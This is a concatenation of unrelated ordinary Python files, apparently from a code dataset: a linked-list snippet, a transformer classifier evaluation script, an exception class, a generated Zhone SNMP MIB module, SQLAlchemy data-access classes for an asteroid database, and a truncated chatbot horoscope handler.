current.next= current.next.next
prev.next.next = current
current = current.next
prev = prev.next.next
return dummy.next
def printListNode(head):
while head:
print(str(head.val) +" ----->", end=" ")
head= head.next
print()
list = ListNode(1)
list.next = ListNode(2)
list.next.next = ListNode(3)
list.next.next.next = ListNode(4)
printListNode(list)
list = swapPairs(list)
printListNode(list)
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import tensorflow as tf
import torch
from torch.nn import BCEWithLogitsLoss, BCELoss
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from keras.preprocessing.sequence import pad_sequences
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import classification_report, confusion_matrix, multilabel_confusion_matrix, f1_score, accuracy_score
import pickle
from transformers import *
from tqdm import tqdm, trange
from ast import literal_eval
from transformers import AutoTokenizer, AutoModel,AutoModelForSequenceClassification
import pickle
import json
from utils import *
import pdb
#clf
from transformers import GPT2ForSequenceClassification
if __name__ == '__main__':
import argparse, sys
parser = argparse.ArgumentParser()
#首先是mandatory parameters
parser.add_argument("--task",default="multiLabelClassification",choices=["multiLabelClassification","twitter"])
parser.add_argument("--model_name", help="legalBert vs roberta",choices=["legalBert","legalRoberta","bert_uncased","bert_cased","bert_large","gpt2","roberta"])
parser.add_argument("--cpu",action='store_true')
parser.add_argument("-bs","--batch_size",type=int,default=None)
#解析参数
args = parser.parse_args()
task=args.task
if task=="twitter":
with open("config_twitter.json", "r") as read_file:
config = json.load(read_file)
elif task=="multiLabelClassification":
with open("config.json", "r") as read_file:
config = json.load(read_file)
NUM_LABELS=config["task"]["NUM_LABELS"]
# Select a batch size for training. For fine-tuning with XLNet, the authors recommend a batch size of 32, 48, or 128. We will use 32 here to avoid memory issues.
batch_size=config["task"]['batch_size']
if args.batch_size:
batch_size=args.batch_size
# set the expeiment model name
model_name=args.model_name
cpu=args.cpu
#max number of input tokens for one sentence
if model_name=='gpt':
max_length=config["task"]["max_length_gpt"]
else:
max_length=config["task"]["max_length_bert"]
#cuda
if cpu:
device = torch.device("cpu")
print("using multi cpu mode")
else:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
print("torch.cuda.is_available: ",torch.cuda.is_available())
print("torch.cuda.device_count:",n_gpu)
test_loader_fn='/mnt/localdata/geng/data/downstream/{task}/{model_name}/test_data_loader_bs{batch_size}'.format(model_name=model_name,batch_size=batch_size,task=task)
if cpu:
test_dataloader=torch.load(test_loader_fn,map_location=torch.device('cpu'))
else:
test_dataloader=torch.load(test_loader_fn)
# import pretrained model
if model_name=="gpt2":
model=GPT2ForSequenceClassification.from_pretrained("gpt2", num_labels=NUM_LABELS)
else:
model=AutoModelForSequenceClassification.from_pretrained(config['model'][model_name], num_labels=NUM_LABELS)
model_fn='/mnt/localdata/geng/model/downstream/{task}/{model_name}/clf_{model_name}'.format(model_name=model_name,task=task)
if cpu:
clf_model=torch.load(model_fn,map_location=torch.device('cpu'))
else:
clf_model=torch.load(model_fn)
model.load_state_dict(clf_model)
if cpu:
parallel_model=model
else:
parallel_model = torch.nn.DataParallel(model) # Encapsulate the model
parallel_model.cuda()
# Put model in evaluation mode to evaluate loss on the test set
parallel_model.eval()
# Variables to gather full output
logit_preds,true_labels,pred_labels,tokenized_texts = [],[],[],[]
# Predict
for i, batch in enumerate(test_dataloader):
batch = tuple(t.to(device) for t in batch)
# Unpack the inputs from our dataloader
b_input_ids, b_input_mask, b_labels, b_token_types = batch
with torch.no_grad():
# Forward pass
outs = parallel_model(b_input_ids, token_type_ids=b_token_types, attention_mask=b_input_mask)
b_logit_pred = outs[0]
pred_label = torch.sigmoid(b_logit_pred)
b_logit_pred = b_logit_pred.detach().cpu().numpy()
pred_label = pred_label.to('cpu').numpy()
b_labels = b_labels.to('cpu').numpy()
tokenized_texts.append(b_input_ids)
logit_preds.append(b_logit_pred)
true_labels.append(b_labels)
pred_labels.append(pred_label)
# Flatten outputs
pred_labels = [item for sublist in pred_labels for item in sublist]
true_labels = [item for sublist in true_labels for item in sublist]
# Calculate Accuracy
threshold = 0.50
pred_bools = [pl>threshold for pl in pred_labels]
true_bools = [tl==1 for tl in true_labels]
val_f1_accuracy = f1_score(true_bools,pred_bools,average='micro')*100
val_flat_accuracy = accuracy_score(true_bools, pred_bools)*100
print('F1 test Accuracy: ', val_f1_accuracy)
print('Flat test Accuracy: ', val_flat_accuracy)
with open("/mnt/localdata/geng/model/downstream/{task}/{model_name}/prediction.pickle".format(model_name=model_name,task=task), "wb") as f:
pickle.dump((pred_labels,true_labels), f)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""Class for dependency error exception
.. module:: lib.exceptions.dependencyerror
:platform: Unix
:synopsis: Class for dependency error exception
.. moduleauthor:: Petr Czaderna <pc@hydratk.org>
"""
class DependencyError(Exception):
"""Class DependencyError
"""
def __init__(self, error_num, args, msg):
"""Class constructor
Called when object is initialized
Args:
error_num (int): number
args (list): arguments
msg (str): message
"""
self.error_num = error_num
self.args = args
self.message = msg
|
nilq/baby-python
|
python
|
#
# PySNMP MIB module Zhone (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Zhone
# Produced by pysmi-0.3.4 at Mon Apr 29 18:11:18 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup, ObjectGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup", "ObjectGroup")
TimeTicks, Counter64, ObjectIdentity, Bits, IpAddress, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, ModuleIdentity, Counter32, NotificationType, Unsigned32, iso, MibIdentifier, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "Counter64", "ObjectIdentity", "Bits", "IpAddress", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "ModuleIdentity", "Counter32", "NotificationType", "Unsigned32", "iso", "MibIdentifier", "Gauge32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
zhone = ModuleIdentity((1, 3, 6, 1, 4, 1, 5504))
zhone.setRevisions(('2011-12-05 16:58', '2011-05-06 00:20', '2010-02-19 10:51', '2009-05-27 02:08', '2008-01-23 11:46', '2007-11-09 13:05', '2007-10-16 10:26', '2007-02-17 13:43', '2006-06-09 12:48', '2005-12-01 14:20', '2004-10-13 14:40', '2004-10-08 11:15', '2004-08-11 15:42', '2004-01-30 13:34', '2003-10-28 11:03', '2003-07-17 14:29', '2002-03-04 15:34', '2001-10-09 12:07', '2000-09-28 16:32', '2000-12-18 16:32', '2000-12-20 17:20', '2001-02-07 17:11', '2001-02-22 11:35', '2001-04-10 14:35', '2001-05-15 10:32', '2001-06-26 17:06', '2001-06-28 13:33', '2001-07-31 08:51', '2001-08-29 16:56', '2001-08-31 15:33',))
if mibBuilder.loadTexts: zhone.setLastUpdated('201112052000Z')
if mibBuilder.loadTexts: zhone.setOrganization('Zhone Technologies')
zhoneRegistrations = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1))
if mibBuilder.loadTexts: zhoneRegistrations.setStatus('current')
zhoneRegPls = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 1))
if mibBuilder.loadTexts: zhoneRegPls.setStatus('current')
zhoneRegCpe = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 2))
if mibBuilder.loadTexts: zhoneRegCpe.setStatus('current')
zhoneRegMux = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 3))
if mibBuilder.loadTexts: zhoneRegMux.setStatus('current')
zhoneRegSechtor = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 4))
if mibBuilder.loadTexts: zhoneRegSechtor.setStatus('current')
zhoneRegWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 5))
if mibBuilder.loadTexts: zhoneRegWtn.setStatus('current')
zhoneRegMalc = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 1, 6))
if mibBuilder.loadTexts: zhoneRegMalc.setStatus('current')
zhoneProduct = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2))
if mibBuilder.loadTexts: zhoneProduct.setStatus('current')
zhonePls = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 1))
if mibBuilder.loadTexts: zhonePls.setStatus('current')
zhoneZedge = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 2))
if mibBuilder.loadTexts: zhoneZedge.setStatus('current')
zhoneZplex = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 3))
if mibBuilder.loadTexts: zhoneZplex.setStatus('current')
zhoneSechtor = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4))
if mibBuilder.loadTexts: zhoneSechtor.setStatus('current')
sechtor100 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4, 1))
if mibBuilder.loadTexts: sechtor100.setStatus('current')
sechtor300 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 4, 2))
if mibBuilder.loadTexts: sechtor300.setStatus('current')
zhoneWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 5))
if mibBuilder.loadTexts: zhoneWtn.setStatus('current')
zhoneMalc = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 6))
if mibBuilder.loadTexts: zhoneMalc.setStatus('current')
zhoneZmsProduct = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 2, 7))
if mibBuilder.loadTexts: zhoneZmsProduct.setStatus('current')
zhoneGeneric = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3))
if mibBuilder.loadTexts: zhoneGeneric.setStatus('current')
zhoneSystem = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 1))
if mibBuilder.loadTexts: zhoneSystem.setStatus('current')
zhoneShelf = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 2))
if mibBuilder.loadTexts: zhoneShelf.setStatus('current')
zhoneCard = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 3))
if mibBuilder.loadTexts: zhoneCard.setStatus('current')
zhoneSubscriber = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 4))
if mibBuilder.loadTexts: zhoneSubscriber.setStatus('current')
zhoneInterfaceTranslation = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 5))
if mibBuilder.loadTexts: zhoneInterfaceTranslation.setStatus('current')
zhoneInterfaceGroup = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 6))
if mibBuilder.loadTexts: zhoneInterfaceGroup.setStatus('current')
zhoneMasterAgent = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 7))
if mibBuilder.loadTexts: zhoneMasterAgent.setStatus('current')
zhoneTrapModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 8))
if mibBuilder.loadTexts: zhoneTrapModules.setStatus('current')
zhoneGenWtn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 9))
if mibBuilder.loadTexts: zhoneGenWtn.setStatus('current')
zhoneZAP = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 10))
if mibBuilder.loadTexts: zhoneZAP.setStatus('current')
zhoneVoiceStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 11))
if mibBuilder.loadTexts: zhoneVoiceStats.setStatus('current')
zhoneSFF = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 12))
if mibBuilder.loadTexts: zhoneSFF.setStatus('current')
zhoneInterfaceConfig = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 3, 13))
if mibBuilder.loadTexts: zhoneInterfaceConfig.setStatus('current')
zhoneCommunicationProtocols = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4))
if mibBuilder.loadTexts: zhoneCommunicationProtocols.setStatus('current')
zhoneIp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 1))
if mibBuilder.loadTexts: zhoneIp.setStatus('current')
zhoneAtm = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 2))
if mibBuilder.loadTexts: zhoneAtm.setStatus('current')
zhoneVoice = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 3))
if mibBuilder.loadTexts: zhoneVoice.setStatus('current')
zhoneVoip = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 4))
if mibBuilder.loadTexts: zhoneVoip.setStatus('current')
zhonePpp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 5))
if mibBuilder.loadTexts: zhonePpp.setStatus('current')
zhoneIma = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 6))
if mibBuilder.loadTexts: zhoneIma.setStatus('current')
zhoneBridge = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 7))
if mibBuilder.loadTexts: zhoneBridge.setStatus('current')
zhoneVideo = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 8))
if mibBuilder.loadTexts: zhoneVideo.setStatus('current')
zhoneIsdn = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 9))
if mibBuilder.loadTexts: zhoneIsdn.setStatus('current')
zhoneCes = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 10))
if mibBuilder.loadTexts: zhoneCes.setStatus('current')
zhoneSs7 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 11))
if mibBuilder.loadTexts: zhoneSs7.setStatus('current')
zhoneClass5 = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 12))
if mibBuilder.loadTexts: zhoneClass5.setStatus('current')
zhoneBonding = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 13))
if mibBuilder.loadTexts: zhoneBonding.setStatus('current')
zhoneRadius = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 14))
if mibBuilder.loadTexts: zhoneRadius.setStatus('current')
zhoneIua = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 15))
if mibBuilder.loadTexts: zhoneIua.setStatus('current')
zhone802Dot1Mibs = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 16))
if mibBuilder.loadTexts: zhone802Dot1Mibs.setStatus('current')
zhonePtp = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 4, 17))
if mibBuilder.loadTexts: zhonePtp.setStatus('current')
zhonePhysical = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5))
if mibBuilder.loadTexts: zhonePhysical.setStatus('current')
zhoneEnet = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 1))
if mibBuilder.loadTexts: zhoneEnet.setStatus('current')
zhoneDsx = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 2))
if mibBuilder.loadTexts: zhoneDsx.setStatus('current')
zhoneOcx = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 3))
if mibBuilder.loadTexts: zhoneOcx.setStatus('current')
zhoneDsl = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 4))
if mibBuilder.loadTexts: zhoneDsl.setStatus('current')
zhoneConsole = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 5))
if mibBuilder.loadTexts: zhoneConsole.setStatus('current')
zhoneRadio = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 8))
if mibBuilder.loadTexts: zhoneRadio.setStatus('current')
zhoneSonet = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 9))
if mibBuilder.loadTexts: zhoneSonet.setStatus('current')
zhoneDs3Ext = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 10))
if mibBuilder.loadTexts: zhoneDs3Ext.setStatus('current')
zhoneLineTypes = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 11))
if mibBuilder.loadTexts: zhoneLineTypes.setStatus('current')
zhoneApon = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 12))
if mibBuilder.loadTexts: zhoneApon.setStatus('current')
zhoneVdsl = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 13))
if mibBuilder.loadTexts: zhoneVdsl.setStatus('current')
zhoneGpon = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 14))
if mibBuilder.loadTexts: zhoneGpon.setStatus('current')
zhoneWdm = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 15))
if mibBuilder.loadTexts: zhoneWdm.setStatus('current')
zhoneCpe = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 5, 16))
if mibBuilder.loadTexts: zhoneCpe.setStatus('current')
zhoneModules = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 6))
if mibBuilder.loadTexts: zhoneModules.setStatus('current')
zhoneShelfSlotTable = MibTable((1, 3, 6, 1, 4, 1, 5504, 7), )
if mibBuilder.loadTexts: zhoneShelfSlotTable.setStatus('current')
zhoneShelfSlotEntry = MibTableRow((1, 3, 6, 1, 4, 1, 5504, 7, 1), ).setIndexNames((0, "Zhone", "zhoneShelfIndex"), (0, "Zhone", "zhoneSlotIndex"))
if mibBuilder.loadTexts: zhoneShelfSlotEntry.setStatus('current')
zhoneShelfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneShelfIndex.setStatus('current')
zhoneSlotIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 5504, 7, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: zhoneSlotIndex.setStatus('current')
zhoneCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9))
zhoneGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9, 1))
zhoneShelfSlotGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 5504, 9, 1, 1)).setObjects(("Zhone", "zhoneShelfIndex"), ("Zhone", "zhoneSlotIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
zhoneShelfSlotGroup = zhoneShelfSlotGroup.setStatus('current')
zhoneCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 5504, 9, 2))
zhoneShelfSlotCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5504, 9, 2, 1)).setObjects(("Zhone", "zhoneShelfSlotGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
zhoneShelfSlotCompliance = zhoneShelfSlotCompliance.setStatus('current')
zhoneExperimental = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10))
if mibBuilder.loadTexts: zhoneExperimental.setStatus('current')
ietfDrafts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1))
if mibBuilder.loadTexts: ietfDrafts.setStatus('current')
apsMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 1))
if mibBuilder.loadTexts: apsMIB.setStatus('current')
sipTC = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 2))
if mibBuilder.loadTexts: sipTC.setStatus('current')
sipCommonMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 3))
if mibBuilder.loadTexts: sipCommonMIB.setStatus('current')
sipUAMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 4))
if mibBuilder.loadTexts: sipUAMIB.setStatus('current')
pktcIetfSigMib = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 5))
if mibBuilder.loadTexts: pktcIetfSigMib.setStatus('current')
efmOamMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 6))
if mibBuilder.loadTexts: efmOamMIB.setStatus('current')
efmCuMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 7))
if mibBuilder.loadTexts: efmCuMIB.setStatus('current')
pwTcStdMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 8))
if mibBuilder.loadTexts: pwTcStdMIB.setStatus('current')
ianaPwe3MIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 9))
if mibBuilder.loadTexts: ianaPwe3MIB.setStatus('current')
pwStdMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 10))
if mibBuilder.loadTexts: pwStdMIB.setStatus('current')
pwTDMMIB = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 11))
if mibBuilder.loadTexts: pwTDMMIB.setStatus('current')
zhoneRmonMibModule = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 1, 12))
if mibBuilder.loadTexts: zhoneRmonMibModule.setStatus('current')
zhoneDrafts = ObjectIdentity((1, 3, 6, 1, 4, 1, 5504, 10, 2))
if mibBuilder.loadTexts: zhoneDrafts.setStatus('current')
mibBuilder.exportSymbols("Zhone", zhoneCpe=zhoneCpe, zhone=zhone, zhoneZAP=zhoneZAP, zhoneIma=zhoneIma, zhoneShelfIndex=zhoneShelfIndex, zhoneWtn=zhoneWtn, zhoneRegWtn=zhoneRegWtn, zhonePhysical=zhonePhysical, zhoneConsole=zhoneConsole, zhoneRegistrations=zhoneRegistrations, zhoneRmonMibModule=zhoneRmonMibModule, zhoneSonet=zhoneSonet, zhoneIua=zhoneIua, zhoneCompliance=zhoneCompliance, zhoneSs7=zhoneSs7, zhoneDsl=zhoneDsl, zhoneRegPls=zhoneRegPls, ietfDrafts=ietfDrafts, zhonePpp=zhonePpp, zhone802Dot1Mibs=zhone802Dot1Mibs, zhoneGroups=zhoneGroups, zhoneProduct=zhoneProduct, sechtor300=sechtor300, zhonePtp=zhonePtp, zhoneAtm=zhoneAtm, zhoneEnet=zhoneEnet, sechtor100=sechtor100, zhoneDrafts=zhoneDrafts, zhoneShelf=zhoneShelf, zhonePls=zhonePls, zhoneModules=zhoneModules, zhoneShelfSlotEntry=zhoneShelfSlotEntry, zhoneSechtor=zhoneSechtor, zhoneApon=zhoneApon, zhoneZmsProduct=zhoneZmsProduct, apsMIB=apsMIB, zhoneSFF=zhoneSFF, sipTC=sipTC, zhoneRegCpe=zhoneRegCpe, zhoneClass5=zhoneClass5, zhoneCes=zhoneCes, zhoneCard=zhoneCard, zhoneVideo=zhoneVideo, zhoneRegMalc=zhoneRegMalc, zhoneCompliances=zhoneCompliances, zhoneVdsl=zhoneVdsl, zhoneSystem=zhoneSystem, zhoneInterfaceGroup=zhoneInterfaceGroup, zhoneShelfSlotTable=zhoneShelfSlotTable, pwTcStdMIB=pwTcStdMIB, zhoneInterfaceTranslation=zhoneInterfaceTranslation, pktcIetfSigMib=pktcIetfSigMib, zhoneVoip=zhoneVoip, zhoneMalc=zhoneMalc, zhoneShelfSlotCompliance=zhoneShelfSlotCompliance, zhoneShelfSlotGroup=zhoneShelfSlotGroup, zhoneBridge=zhoneBridge, sipUAMIB=sipUAMIB, zhoneGeneric=zhoneGeneric, zhoneVoiceStats=zhoneVoiceStats, zhoneExperimental=zhoneExperimental, zhoneDs3Ext=zhoneDs3Ext, zhoneSlotIndex=zhoneSlotIndex, zhoneVoice=zhoneVoice, zhoneIsdn=zhoneIsdn, zhoneMasterAgent=zhoneMasterAgent, zhoneLineTypes=zhoneLineTypes, PYSNMP_MODULE_ID=zhone, efmOamMIB=efmOamMIB, zhoneRegMux=zhoneRegMux, zhoneBonding=zhoneBonding, pwStdMIB=pwStdMIB, zhoneOcx=zhoneOcx, zhoneZplex=zhoneZplex, zhoneCommunicationProtocols=zhoneCommunicationProtocols, zhoneTrapModules=zhoneTrapModules, zhoneRadius=zhoneRadius, ianaPwe3MIB=ianaPwe3MIB, zhoneWdm=zhoneWdm, efmCuMIB=efmCuMIB, zhoneInterfaceConfig=zhoneInterfaceConfig, sipCommonMIB=sipCommonMIB, zhoneZedge=zhoneZedge, zhoneGpon=zhoneGpon, zhoneIp=zhoneIp, zhoneSubscriber=zhoneSubscriber, zhoneGenWtn=zhoneGenWtn, zhoneDsx=zhoneDsx, zhoneRadio=zhoneRadio, pwTDMMIB=pwTDMMIB, zhoneRegSechtor=zhoneRegSechtor)
|
nilq/baby-python
|
python
|
from sqlalchemy import create_engine, Table, MetaData
from sqlalchemy.sql import select, delete, update, and_
import collections
from config import *
import datetime
class Dao():
con = None
def get_db_engine(self):
engine = create_engine(
'postgresql+psycopg2://%s:%s@%s:%s/%s' % (
DB_USER,
DB_PASS,
DB_HOST,
DB_PORT,
DB_NAME))
return engine
def get_con(self):
if self.con is None:
engine = self.get_db_engine()
self.con = engine.connect()
return self.con
def get_table(self, tablename, schema=None):
engine = self.get_db_engine()
tbl = Table(
tablename, MetaData(engine), autoload=True, schema=schema)
return tbl
def fetch_all_dict(self, stm):
engine = self.get_db_engine()
with engine.connect() as con:
queryset = con.execute(stm)
rows = list()
for row in queryset:
d = dict(collections.OrderedDict(row))
rows.append(d)
return rows
def fetch_one_dict(self, stm):
engine = self.get_db_engine()
with engine.connect() as con:
queryset = con.execute(stm).fetchone()
if queryset is not None:
d = dict(collections.OrderedDict(queryset))
return d
else:
return None
def get_job_by_id(self, id):
tbl = self.get_table(tablename='des_astrometryjob')
stm = select(tbl.c).where(and_(tbl.c.id == int(id)))
return self.fetch_one_dict(stm)
def import_with_copy_expert(self, sql, data):
"""
This method is recommended for importing large volumes of data. using the postgresql COPY method.
The method is useful to handle all the parameters that PostgreSQL makes available
in COPY statement: https://www.postgresql.org/docs/current/sql-copy.html
it is necessary that the from clause is reading from STDIN.
example:
sql = COPY <table> (<columns) FROM STDIN with (FORMAT CSV, DELIMITER '|', HEADER);
Parameters:
sql (str): The sql statement should be in the form COPY table '.
data (file-like ): a file-like object to read or write
Returns:
rowcount (int): the number of rows that the last execute*() produced (for DQL statements like SELECT) or affected (for DML statements like UPDATE or INSERT)
References:
https://www.psycopg.org/docs/cursor.html#cursor.copy_from
https://stackoverflow.com/questions/30050097/copy-data-from-csv-to-postgresql-using-python
https://stackoverflow.com/questions/13125236/sqlalchemy-psycopg2-and-postgresql-copy
"""
connection = self.get_db_engine().raw_connection()
try:
cursor = connection.cursor()
cursor.copy_expert(sql, data)
connection.commit()
cursor.close()
return cursor.rowcount
except Exception as e:
connection.rollback()
raise (e)
finally:
connection.close()
class AsteroidDao(Dao):
def __init__(self):
super(AsteroidDao, self).__init__()
self.tbl = self.get_table('tno_asteroid')
def get_asteroids_by_names(self, names):
stm = select(self.tbl.c).where(and_(self.tbl.c.name.in_(names)))
rows = self.fetch_all_dict(stm)
return rows
def get_asteroids_by_dynclass(self, dynclass):
stm = select(self.tbl.c).where(and_(self.tbl.c.base_dynclass == dynclass))
rows = self.fetch_all_dict(stm)
return rows
def ccds_by_asteroid(self, asteroid_name):
# des_exposure
de = self.get_table('des_exposure')
# des_ccd
dc = self.get_table('des_ccd')
# Des skybot position
ds = self.get_table('des_skybotposition')
# Skybot Position
sp = self.get_table('skybot_position')
# Clausula where pelo nome do objeto OBRIGATORIO.
clause = list([sp.c.name == asteroid_name])
columns = [dc.c.id, de.c.date_obs,
de.c.exptime, dc.c.path, dc.c.filename]
stm = select(columns).\
select_from(
ds.join(
sp, ds.c.position_id == sp.c.id
).join(
dc, ds.c.ccd_id == dc.c.id
).join(
de, ds.c.exposure_id == de.c.id
)
).\
where(and_(and_(*clause)))
rows = self.fetch_all_dict(stm)
return rows
class ObservationDao(Dao):
def __init__(self):
super(ObservationDao, self).__init__()
self.tbl = self.get_table('des_observation')
def delete_by_asteroid_name(self, name):
stm = delete(self.tbl).where(and_(self.tbl.c.name == name))
engine = self.get_db_engine()
with engine.connect() as con:
rows = con.execute(stm)
return rows
class AstrometryJobDao(Dao):
def __init__(self):
super(AstrometryJobDao, self).__init__()
self.tbl = self.get_table('des_astrometryjob')
def get_job_by_id(self, id):
stm = select(self.tbl.c).where(and_(tbl.c.id == int(id)))
return self.fetch_one_dict(stm)
def update_job(self, job):
stm = update(self.tbl).where(and_(self.tbl.c.id == int(job['id']))).values(
status=job['status'],
start=job['start'],
finish=job['end'],
execution_time=datetime.timedelta(seconds=job['exec_time']),
error=job['error'],
traceback=job['traceback'],
)
engine = self.get_db_engine()
with engine.connect() as con:
return con.execute(stm)
|
nilq/baby-python
|
python
|
from nonebot import on_command
from nonebot.adapters.cqhttp import Event
import requests
from nonebot.adapters.cqhttp import Bot
from nonebot.rule import to_me
weather = on_command("星座运势",rule=to_me(), priority=5)
@weather.handle()
async def handle_first_receive(bot: Bot, event: Event, state: dict):
args = str(event.get_message()).strip() # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海
if args:
state["city"] = args # 如果用户发送了参数则直接赋值
@weather.got("city", prompt="你想查询神马星座的运势(@_@)...")
async def handle_city(bot: Bot, event: Event, state: dict):
city = state["city"]
city_weather = await xin(city)
await weather.finish(city_weather)
async def xin(city: str):
cityname = city
headers = {
